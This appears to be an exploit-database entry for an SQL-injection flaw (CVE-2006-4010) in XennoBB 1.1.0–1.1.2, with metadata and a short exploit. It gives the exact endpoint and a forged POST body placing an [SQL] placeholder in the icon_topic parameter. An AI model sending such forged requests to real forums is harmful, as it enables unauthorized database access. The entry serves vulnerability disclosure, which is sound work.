header-logo
Suggest Exploit
vendor:
XennoBB
by:
Luigi Auriemma
3
CVSS
HIGH
SQL-injection
89
CWE
Product Name: XennoBB
Affected Version From: XennoBB 1.1.0
Affected Version To: XennoBB 1.1.2
Patch Exists: No
Related CWE: CVE-2006-4010
CPE: a:xennoblog:xennoblog:1.1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2006

XennoBB SQL-injection Vulnerability

Submit a forged POST request to topic_post.php?action=post&fid={forum ID here} with the following as the POST data: form_sent=1&form_user={username here}&req_subject=Subject&req_message=Message&submit=1&icon_topic=[SQL]. Successful exploitation leads would lead to the SQL query in the icon_topic parameter being run.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19606/info

XennoBB is prone to an SQL-injection vulnerability that could allow an attacker to influence the structure or logic of SQL queries made by the application.

--------------------- EXPLOIT ---------------------

Submit a forged POST request to

topic_post.php?action=post&fid={forum ID here}

With the following as the POST data:

form_sent=1&form_user={username
here}&req_subject=Subject&req_message=Message&submit=1&icon_topic=[SQL]

Successful exploitation leads would lead to the SQL query in the
icon_topic
parameter being run.